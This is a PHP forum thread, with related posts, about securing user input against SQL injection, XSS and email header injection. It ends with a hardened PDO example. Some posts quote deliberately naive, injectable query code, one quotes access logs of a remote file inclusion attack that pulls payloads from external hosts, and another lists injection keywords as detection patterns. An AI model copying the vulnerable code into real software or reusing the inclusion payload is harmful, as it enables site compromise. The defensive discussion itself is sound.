PHP - Question Mysql Security.... Is This Function Practical, Safe Enough?
Hello, all: I'm a newbie and I'm trying to understand the whole php security thing a bit better, and found this function that seems easy to implement, as well as easy to understand... my question is...
Does this mean I could use regular $_POST, $_GET, $_COOKIE, $_REQUEST variables without having to individually worry about escaping them every time I use them in queries... is this correct? Or safe enough? See the example below, along with how I'm using the variable in a query... it seems to be working fine, as it does echo out the \ escape character when I test it, or when I try to inject it... Appreciate your input!

Code:
<?php
$_POST=sanitize($_POST);
$_GET=sanitize($_GET);
$_COOKIE=sanitize($_COOKIE);
$_REQUEST=sanitize($_REQUEST);

function sanitize($input){
    if(is_array($input)){
        $output=array(); // initialise so an empty array does not leave $output undefined
        foreach($input as $k=>$i){
            $output[$k]=sanitize($i);
        }
    }
    else{
        if(get_magic_quotes_gpc()){
            $input=stripslashes($input); // undo magic quotes first, otherwise values get escaped twice
        }
        $output=mysql_real_escape_string($input); // needs an open mysql connection at this point
    }
    return $output;
}

// a mysql query I could then use would be:
$money = $_GET['money'];
$result = mysql_query("SELECT * FROM countries WHERE currencies = '$money'");
?>

Similar Tutorials

Hello, I am slightly nervous about posting this because I am almost completely new to PHP. I have a few introductory books on the subject which I am working through at the moment as well as some reference books, but I am still getting through the basics of it all. I recently downloaded a login script, which allows a user to log in and also allows the protection of some pages if users are not logged in. This script was a free one from easykiss123. It comes with other .php files and I have given them all a look over and I get the general idea of what's going on for the most part, and I THINK as I keep reading my books I will understand everything even more. However, what I really want to do right now is make it so a website would know which user is logged on, and then use this information elsewhere. For example, if a particular user logged on and submitted something, I would obviously like the submission to be recorded but also the id of the user that submitted it; at the moment with this code, I do not think that is possible, however I could be wrong.
I am looking for any pointers or a nudge in the right direction or a link to a tutorial on how I would go about this, anything that may help. I think I would be storing the user ID in a global variable that can be used throughout the site, but again I am not sure. Thanks in advance for any help. I have included both the login script and the script used for protecting pages; as it's already freely available online I see no issue with posting snippets of it here since the source has been referenced.

Code:
<?php # Script 16.8 - login.php
// This is the login page for the site.
require_once ('includes/config.inc.php');
$page_title = 'Login';
include ('includes/header.html');

if (isset($_POST['submitted'])) {
    require_once (MYSQL);

    // Validate the email address:
    if (!empty($_POST['email'])) {
        $e = mysqli_real_escape_string ($dbc, $_POST['email']);
    } else {
        $e = FALSE;
        echo '<p class="error">You forgot to enter your email address!</p>';
    }

    // Validate the password:
    if (!empty($_POST['pass'])) {
        $p = mysqli_real_escape_string ($dbc, $_POST['pass']);
    } else {
        $p = FALSE;
        echo '<p class="error">You forgot to enter your password!</p>';
    }

    if ($e && $p) { // If everything's OK.

        // Query the database:
        $q = "SELECT user_id, first_name, user_level FROM users WHERE (email='$e' AND pass=SHA1('$p')) AND active IS NULL";
        $r = mysqli_query ($dbc, $q) or trigger_error("Query: $q\n<br />MySQL Error: " . mysqli_error($dbc));

        if (@mysqli_num_rows($r) == 1) { // A match was made.

            // Register the values & redirect:
            $_SESSION = mysqli_fetch_array ($r, MYSQLI_ASSOC);
            mysqli_free_result($r);
            mysqli_close($dbc);

            $url = BASE_URL . 'index.php'; // Define the URL:
            ob_end_clean(); // Delete the buffer.
            header("Location: $url");
            exit(); // Quit the script.

        } else { // No match was made.
            echo '<p class="error">Either the email address and password entered do not match those on file or you have not yet activated your account.</p>';
        }

    } else { // If everything wasn't OK.
        echo '<p class="error">Please try again.</p>';
    }

    mysqli_close($dbc);

} // End of SUBMIT conditional.
?>
<h1>Login</h1>
<p>Your browser must allow cookies in order to log in.</p>
<form action="login.php" method="post">
    <fieldset>
    <p><b>Email Address:</b> <input type="text" name="email" size="20" maxlength="40" /></p>
    <p><b>Password:</b> <input type="password" name="pass" size="20" maxlength="20" /></p>
    <div align="center"><input type="submit" name="submit" value="Login" /></div>
    <input type="hidden" name="submitted" value="TRUE" />
    </fieldset>
</form>
<?php // Include the HTML footer.
include ('includes/footer.html');
?>

Code:
<?php
require_once ('includes/config.inc.php');
$page_title = 'YOUR PAGE TITLE GOES HERE';

// Start output buffering:
ob_start();

// Initialize a session:
session_start();

// Check for a $page_title value:
if (!isset($page_title)) {
    $page_title = 'User Registration';
}

// If no first_name session variable exists, redirect the user:
if (!isset($_SESSION['first_name'])) {
    $url = BASE_URL . 'index.php'; // Define the URL.
    ob_end_clean(); // Delete the buffer.
    header("Location: $url");
    exit(); // Quit the script.
}
?>

Code:
<?php
// Flush the buffered output.
ob_end_flush();
?>

Is this select query code safe from injection?
try {
    $stmt = $db->prepare("SELECT * FROM posts WHERE key=$key");
    $stmt->execute();
    $row = $stmt->fetch();
}

Notice there is no bind.

$stmt->bindParam(':key', $key);

The reason I am asking is that I have many $key variables in the query and I do not know how to use bind in a query such as this...

SELECT count(*) FROM posts WHERE MATCH (file) AGAINST ('$key' IN BOOLEAN MODE) OR MATCH (user) AGAINST ('$key' IN BOOLEAN MODE)

The $key is not an array and the $key does not change its value.
Edited by kalster, 04 January 2015 - 05:52 PM.

Hi, my ISP doesn't allow direct access to the MySQL server so I created a bridge and stored the PHP code in the main web folder (https://www.mydomain.com/post.php). The bridge works fine and is used mainly for my IoT projects. In the same web folder is located the conn.php code containing the server's credentials. The question is, how safe is the PHP code at that location? I can create a subfolder but I'm not sure if it matters as far as security is concerned. TIA

Hey people, I was going over an old script of mine the other day and I ran a web vulnerability scanner on it to see how secure it was and I got an XSS warning. Now this puzzles me because I am not entirely sure how this affects the script and what can/can't be done. This script is old so I will paste the relevant bits in here; it was playing with the $page variable. What damage could you do and how would you remedy the problem?

Code:
if(isset($_GET['page'])) {
    if($_GET['page'] > $numpages) {
        $page = 1;
    } else {
        $page = $_GET['page'];
    }
} else {
    $page = 1;
}
echo ('<strong style="margin-top: 4px; margin-left: 3px;">Page ' . $page . ' of ' . $numpages . '</strong></p>');

By putting a non-number in there like hello.php?page=Hello, it simply output the word hello, so I am not fully sure what the security implications are and how insecure it really is. Might sound like a dumb question but it's been nagging at me. Thanks for reading!

Hi everyone!
I have a question that might sound silly... I have stored in my database a URL to a pic and some other data. I am unsure whether, when I retrieve data from my database, I need some sort of protection. I usually sanitize and prevent SQL injections when I code forms, but I am not sure if I have to do the same when I get data from the database. Thanks for your help. Veronica

If I have a page that requires people to be logged in to view it, and if that page requires a function page (with only PHP code on it), does that function page need to have the same safe file on it to keep people from going straight to that function page? Or would it not matter?

I have a form that when submitted inserts the input values into a database. I was wondering what measures I can take to make sure that it is as secure as possible. Below I have added some basic code. Any help on how to modify this code to protect against injection attacks etc. would be great.

if(isset($_POST['form_submit'])) {
    $submit_sql = "insert into websites (website_name, website_description,website_url) values (\"" . $_POST['website_name'] . "\",\"" . $_POST['website_description'] . "\",\"" . $_POST['website_url'] . "\")";
    $submit_rs = mysql_query($submit_sql, $mysql_conn);
}

Hi all, I have a book with some nice examples, but often I wonder if they are that secure for displaying and using outside the production area. One of them is this. A form is created by using a while loop that gets data (email addresses) from a database and shows them with check boxes. After that someone can select the e-mail addresses they don't like and delete them from the database. Here is some code:

<?php
//....
$result = mysqli_query($dbc,$query);
while ($row = mysqli_fetch_array($result)){
    // value needs "=" and a space before name, otherwise the attribute is malformed
    echo '<input type="checkbox" value="'.$row['id'].'" name="todelete[]"/>';
    echo $row['firstname'];
}
//.........deleting part
if (isset($_POST['submit'])){
    foreach($_POST['todelete'] as $delete_id){
        $query = "DELETE FROM email_list WHERE ID = $delete_id";
        mysqli_query ($dbc, $query) or die ('error querying database');
    }
}
//....
?>

I have two questions:
-> Is this a smart way of deleting stuff? Since you are going to use multiple queries instead of 1 in the foreach loop.
-> Besides not using mysqli_real_escape_string, isn't this application allowing someone to alter the POST array (todelete) to any value he likes? At least that's what I think can happen.
If anyone knows a nicer way to do this more securely, I would love to hear it, because I don't really trust the HTML array created. Thanks in advance!

I have a business social network site on a hosting server. I am wondering if sessions are secure enough.

ini_set('session.use_only_cookies', 1); //this prevent Session Fixation?
session_start();
if($_SESSION['loggedIn'] && $_SESSION['userIP']==$_SERVER["REMOTE_ADDR"]) // extra security
    //user is logged in, assign all data to this profile from session
else
    //user is not logged in, no data are assigned

Would you consider that secure enough?

Apologies for the lame subject title - I don't know what to call this thread. Last year, before I'd ever opened a book on PHP, my site was hacked. I was using a third party e-commerce script 'Cart Keeper' (since replaced). Somehow, the hackers planted some files on my server that looked like official bank pages (I'm sure you've all seen the sort of thing). Here are some log files sent by my host at that time...

Quote
"GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:48 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:49 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:59:24 +0100] "GET /arts//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 302 313 "-" "libwww-perl/5.65"
www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:26 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:28 +0100] "GET //ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
www.example.com 66.249.134.74 - - [19/Jun/2009:12:01:32 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.805"
www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:47 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:48 +0100] "GET /ckshop.php//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 311 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:12:01:49 +0100] "GET /ckshop.php?category=21//ckshop.php?incdir=http://www.epoca.co.cr/modules/My_eGallery/gallery/yes.txt??? HTTP/1.1" 200 42 "-" "libwww-perl/5.65"
www.example.com 89.38.128.43 - - [19/Jun/2009:11:58:52 +0100] "GET //ckshop.php?incdir=http://racrew.us/ec.txt?? HTTP/1.1" 200 357 "-" "libwww-perl/5.65"

and here is what they wrote to me at the time...

Quote
The majority of these files were then caught by our egress firewall as they had completed, as the file in question had allowed the http user to call a shell and use a variety of code (wget lwp et al) to call in external toolkits. This attack was mostly mechanised, however was changing, so it is my belief that the perpetrator was reconfiguring the attack as he went as failures were seen. Please check your site code for possible updates, security updates, and ensure that no files have been changed that should not have been. Please confirm that you have read this mail and are aware of the implications / taking action.

Can someone identify the name of this type of attack? ...and possibly a tutorial on securing against this form of attack? As I am learning PHP, I would like to make sure it doesn't happen again. Many thanks for your help

I'm making a map atm which will have tokens (not sure what you call them) in the link like map.php?id=token. Well I don't want a 3rd party coming along in the future and making their own map using my y and x coords. So I was thinking maybe the best way around this is to use an encryption in the link? So encrypting the x and y coords in the link. Anyone have any ideas on this? Also I was wondering, is it impossible for PHP to know when someone clicks a link? I was googling around and it doesn't seem like you can simply use a $_POST for a link.

I have a PHP page that processes a form. How do I prevent someone from making their own form on their own domain and then saying <form method=post action = "www.hackerdomain.com/bad.php"> and then passing their own variables? Do I set up a $session variable on my form page and assign it to $_SERVER["PHP_SELF"]?
Hi all, I have heard stories that hackers/viruses, or basically something that you don't want uploaded to a server through a website form, have been able to type some sort of code into an HTML form field to access information. I know how to control the length of fields, how to validate that an email address is in the correct format etc. - but when it comes to having a textfield for the user to add up to 2000 characters of their own words, how can I protect from malicious code being inserted? The textfield is located inside the user area but anyone can join, so anyone ultimately can enter code! Thanks for the help.

Hi Guys, I have built a simple form, which has text fields Name, Telephone Number, Best Time to Call and E-mail. For security purposes, I am testing each against the function shown below which looks for dangerous code snippets, in an effort to protect against email header injection attacks. When it comes to the E-mail field, I am not actually testing whether a valid e-mail address has been entered, as it is the telephone number which is essential, not the e-mail. My question is, do you think this is a security weakness? Many thanks

Code:
//http://www.tonyspencer.com/2005/12/15/email-injection-exploit-through-a-php-contact-form/
//preg_match string to match goes within forward slashes, i.e. /str/, and i at the end makes it case insensitive
function containsInjectionAttempt($input) {
    if (preg_match("/\r/i", $input) ||
        preg_match("/\n/i", $input) ||
        preg_match("/%0a/i", $input) ||
        preg_match("/%0d/i", $input) ||
        preg_match("/Content-Type:/i", $input) ||
        preg_match("/<script>/i", $input) ||
        preg_match("/bcc:/i", $input) ||
        preg_match("/to:/i", $input) ||
        preg_match("/cc:/i", $input)) {
        return true;
    } else {
        return false;
    }
}

I am trying to keep the user input clean with this script but can't figure out what is wrong with it.
The error I am getting is: Warning: preg_match() expects parameter 1 to be string,

$bad_strings = array(
    "content-type:",
    "mime-version:",
    "multipart/mixed",
    "Content-Transfer-Encoding:",
    "bcc:",
    "cc:",
    "to:",
);
if (preg_match($bad_strings, $first_name)) {
    die;

I have a login system that uses a flat file database. The flat file is in a directory outside the public_html. My questions:
1- Is it still possible to hack into that file? Currently I do not encrypt the passwords as I have been told that having the file outside the public_html makes the file unavailable to the public. This allows me the advantage of sending the username and password to the user in an email if they forget their password or username. Otherwise I would have to set up a more complicated method to allow them to change their password to regain access to the site. I have an SSL on the site also so I am not worried about packet sniffing. Thanks

I must confess, I've not really done much unit testing at all in the last 3 years. Can anyone give me an idea of what they would test and why that would be faster or more efficient than running the code as a user? One area I can see it having huge benefits is when I'm testing methods which interact with a database, like user registration, which I would probably test by registering several times - fixing any bugs, making amendments and repeating. Ok, so I kinda sold the idea to myself there. But what about for small applications? I've seen people testing whether a variable is countable... why would I not just check the output immediately? Appreciate any advice.

Code:
$stick_topic = isset($_POST['stick_topic']) ? '1' : '0';

Does this need to be escaped while entering the database, or no, because the values could only be 1 or 0?

Sorry, it's just I got hacked so I am trying to do my security #1 using this below. Is it safe against hackers?
Code:
$post_id = intval($_GET['report']);
if ($post_id < 1)
    message($lang_common['Bad request']);

query:

Code:
$result = $db->query('SELECT subject, forum_id FROM '.$db->prefix.'topics WHERE id='.$topic_id) or error('Unable to fetch topic info', __FILE__, __LINE__, $db->error());

Should I escape my $topic_id?

Hello all. Just wanted to run this past you guys to see if I am missing anything important. I am making a script that I plan to allow a lot of other people around the web to use, so I want to make sure it's as bullet proof as possible. I am passing two values and grabbing them with a _GET; one is a big number, and the other is only letters and 8 characters long. Here's my code so far.

Code:
<?php
$clan = $_GET['clanid'];
// make sure it's an INT
//if(isint($clan)){
if(ereg("[^0-9]", $clan)){
    // a non-digit was found, so it is not an int.
    echo ("ERROR Invalid CLANID");
    die;
}
// make sure it's an 8 letter only word.
$style=$_GET['style'];
// cut style down to 8 characters long.
$style=substr($style, 0, 8);
if(ereg("[^a-zA-Z]+", $style)) {
    // something other than letters was found.
    echo("ERROR Invalid STYLE NAME");
    die;
}
?>

To my noob PHP eyes it looks pretty solid, I can't think of any way a malicious user could get past it, but like I said, thought I would run it past you guys first, you can never be too careful.
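One hardened version of what several posts in this thread are asking about, written as an added example rather than code from any poster: the clanid and style checks from the last post done with whitelist preg_match patterns, and the currency lookup from the first post and the twice-used $key from kalster's post done with PDO prepared statements instead of a global escaping pass. It assumes PHP with the PDO SQLite driver; SQLite in memory stands in for MySQL so it runs offline, and the rows are constructed.

```php
<?php
declare(strict_types=1);

// Added example: PDO with an in-memory SQLite database stands in for MySQL so
// this runs offline; the rows inserted below are constructed sample data.

function validateClanId($raw): ?int
{
    // Accept only a string of 1-10 ASCII digits; "12abc", " 12", "+12" and "0x1" are rejected.
    if (!is_string($raw) || !preg_match('/^[0-9]{1,10}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function validateStyle($raw): ?string
{
    // Exactly 1-8 ASCII letters; reject over-long input instead of silently truncating it.
    if (!is_string($raw) || !preg_match('/^[A-Za-z]{1,8}$/', $raw)) {
        return null;
    }
    return $raw;
}

function findCountries(PDO $db, string $currency): array
{
    // The value travels separately from the SQL text, so no escaping layer is needed.
    $stmt = $db->prepare('SELECT name FROM countries WHERE currencies = :cur');
    $stmt->execute([':cur' => $currency]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

function searchPosts(PDO $db, string $key): int
{
    // One value used twice gets two placeholders: reusing a single named
    // placeholder only works when PDO emulates prepares. LIKE stands in for
    // MATCH ... AGAINST (SQLite has none); % and _ inside $key still act as wildcards.
    $stmt = $db->prepare('SELECT COUNT(*) FROM posts WHERE file LIKE :k1 OR user LIKE :k2');
    $stmt->execute([':k1' => "%$key%", ':k2' => "%$key%"]);
    return (int) $stmt->fetchColumn();
}

// Constructed sample rows for the tables named in the posts.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE countries (name TEXT, currencies TEXT)');
$db->exec("INSERT INTO countries VALUES ('Japan','JPY'),('France','EUR'),('Spain','EUR')");
$db->exec('CREATE TABLE posts (file TEXT, user TEXT)');
$db->exec("INSERT INTO posts VALUES ('report.pdf','alice'),('notes.txt','bob')");

// A classic injection string is just a currency nobody uses: zero rows, query unchanged.
var_dump(findCountries($db, "EUR' OR '1'='1"));
var_dump(findCountries($db, 'EUR'));
var_dump(searchPosts($db, 'ali'));
var_dump(validateClanId('123'), validateClanId('12abc'));
var_dump(validateStyle('Redfox'), validateStyle('ToolongStyle'));
```

Rejecting input that fails the whitelist, rather than truncating or casting it, keeps the later query from ever seeing a value the code did not intend.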